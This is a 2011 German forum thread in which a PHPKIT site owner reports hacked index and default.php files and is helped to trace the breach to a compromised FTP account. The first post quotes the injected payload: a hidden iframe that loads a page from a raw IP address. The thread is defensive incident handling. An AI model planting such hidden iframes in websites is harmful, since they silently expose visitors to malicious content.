Forum Partner+Friends LinkUs Downloads KNW Suche TS³ Viewer Twitter Facebook

1.6.5 Einer sich eingehackt

Jetzt kostenlos Anmelden!
  • 1
  • 2


flipmode

ist gerade angekommen

Beiträge: 6

1

Freitag, 21. Januar 2011, 21:33

Einer sich eingehackt

Hi leute, habe gerade das problem gehabt das auf unserer website lauter fehlermeldungen auftauchten.
"Warning: Cannot modify header information - headers already sent by......"
Habe natürlich geguckt und gegoogelt und dann ist mir aufgefallen, dass die "default.php" die im "/pkinc/func" Ordner zu finden ist, heute mittag geändert wurde (über ftp festgestellt). Ich sofort nachgeschaut und siehe da, ein iframe am ende;
.....
?><iframe src="http://80.91.191.158/stats/priemIframe.php?part=2&hashftp=2d4ab687c7fc9023431446115a24228d&hashpage=5741d4458f4b6927ae662482517780c9" width=10 border=1 height=10 style="visibility:hidden"></iframe>
......
Jetzt meine frage, wie komm ich an weitere informationen was da genau passiert ist und wie kann ich es in der zukunft verhindern?
Wie ist es möglich das jemand die datei ändern kann?
Was sollte ich ambesten machen.....brauche eure hilfe
  • Zum Seitenanfang
  • Zum Seitenende

Dirk Kántor Männlich

aká Dooki

Beiträge: 2 073

Geschlecht: Männlich

PHPKIT Version: keine

2

Freitag, 21. Januar 2011, 21:48

Entweder ist der Server nicht sicher, aber vermutlich sieht es wie eh und jeh nach einem trojaner auf deinem (oder jemand der zugriff per ftp bei dir hat) pc aus..

wenn php dateien bearbeitet wurden kann es aber auch eine shell sein die auf deinem space liegt..
dazu kann folgendes gemacht werden: Security Control - Ordner auf Grafiken mit Schadcode prüfen (1.6.03 - 1.6.5)

sollte es ein trojaner sein der auf einem client pc hockt (client = du oder jemand anderes) der zugriff per ftp hat und somit die ftp daten ausschnüffelt

EDIT: Dagegen kann pkSM nichts unternehmen! *tm* Aktuelle Version [1.6.5]
:thumbsup:    :thumbsup:       *tc*       :thumbsup:    :thumbsup:
8o           Achtung: Dirk Kántor ist unterwegs!           8o
Er verteilt gerne Verwarnungen ohne vorher darüber diskutiert zu haben.
  • Zum Seitenanfang
  • Zum Seitenende

flipmode

ist gerade angekommen

Beiträge: 6

3

Freitag, 21. Januar 2011, 21:59

also habe festgestellt das die index.php den gleichen iframe drin hat..... also ist es nur möglich wenn einer die ftp zugangsdaten hat?
Edit: access logs und ftp logs sind kurz nach mitternacht für heute zur verfügung dann poste ich weitere details
  • Zum Seitenanfang
  • Zum Seitenende

Dirk Kántor Männlich

aká Dooki

Beiträge: 2 073

Geschlecht: Männlich

PHPKIT Version: keine

4

Freitag, 21. Januar 2011, 22:27

in den logs wirst du nur erkennen, mit welcher IP zugegriffen wurde.

check lieber deinen rechner auf einen trojaner ^^ das meine ich ERNST!
:thumbsup:    :thumbsup:       *tc*       :thumbsup:    :thumbsup:
8o           Achtung: Dirk Kántor ist unterwegs!           8o
Er verteilt gerne Verwarnungen ohne vorher darüber diskutiert zu haben.
  • Zum Seitenanfang
  • Zum Seitenende

flipmode

ist gerade angekommen

Beiträge: 6

5

Freitag, 21. Januar 2011, 23:56

also gescannt alles clean... was ich festgestellt hab; alle "index" dateien wurden geändert ABER NUR bei phpkit, habe 2 websiten laufen die unter phpkit laufen, 2 mit phpbb und eine mit joomla. komischerweise wurden nur die dateien (meist die "index dateien") von phpkit angegriffen. Kann es sein das eine neue lücke im phpkit ist?
  • Zum Seitenanfang
  • Zum Seitenende

Dirk Kántor Männlich

aká Dooki

Beiträge: 2 073

Geschlecht: Männlich

PHPKIT Version: keine

6

Samstag, 22. Januar 2011, 00:07

das einzigst lückenhafte was da noch sein kann ist ein upload.. ordner mit chmod 777, avatar upload (siehe link im ersten post von mir)

oder der server is undicht.. aber das liegt wohl kaum in diesem ermessen, es sei denn es ist dein server ^^

mit wieviel programmen, mit welchem, hast du dein rechner gescannt?
:thumbsup:    :thumbsup:       *tc*       :thumbsup:    :thumbsup:
8o           Achtung: Dirk Kántor ist unterwegs!           8o
Er verteilt gerne Verwarnungen ohne vorher darüber diskutiert zu haben.
  • Zum Seitenanfang
  • Zum Seitenende

flipmode

ist gerade angekommen

Beiträge: 6

7

Samstag, 22. Januar 2011, 00:15

antivir und avast... naja ich glaube auch nicht das der pc infiziert ist... gleich müssten die logs kommen dann weiss ich mehr.
aber was kann es sein wenn es ein script ist, nach welchen datein typen sollte ich ausschau halten?
  • Zum Seitenanfang
  • Zum Seitenende

flipmode

ist gerade angekommen

Beiträge: 6

8

Samstag, 22. Januar 2011, 00:42

habs jetzt herausgefunden. hatte noch ein zusetlichen ftp-acc für ein unteradmin erstellt den er ab und an genutzt hat und mit diesem wurden die dateien geändert.
Danke viel mals für deine info und vorallem für die schnellen antworten.
Aber eine frage hätte ich noch. Wenn ich mein backup einspiele, was sollte ich da aufjedenfall ändern? ich warte erstmal ein paar tage und warte bis hier mehr leute geantwortet haben damit ich nicht alles 2x und 3x ändern muss.
  • Zum Seitenanfang
  • Zum Seitenende

Dirk Kántor Männlich

aká Dooki

Beiträge: 2 073

Geschlecht: Männlich

PHPKIT Version: keine

9

Samstag, 22. Januar 2011, 01:45

ändern im sinne von?

Ändere:
FTP Passwort
DB Passwort
Homepage Passwort

Achte bei dem DB Passwort darauf, dass das PHPKIT ebenso nen neues Passwort für die DB braucht. und ggf. auch andere Addons.
:thumbsup:    :thumbsup:       *tc*       :thumbsup:    :thumbsup:
8o           Achtung: Dirk Kántor ist unterwegs!           8o
Er verteilt gerne Verwarnungen ohne vorher darüber diskutiert zu haben.
  • Zum Seitenanfang
  • Zum Seitenende

flipmode

ist gerade angekommen

Beiträge: 6

10

Samstag, 22. Januar 2011, 03:40

alle die FileZilla als ftp programm benutzen und noch nicht gehackt worden sind ein großer tip von mir die passwörter zu ändern und das ding zu löschen. siehe hier: http://bit.ly/gBXa4O
  • Zum Seitenanfang
  • Zum Seitenende
  • 1
  • 2

Ähnliche Themen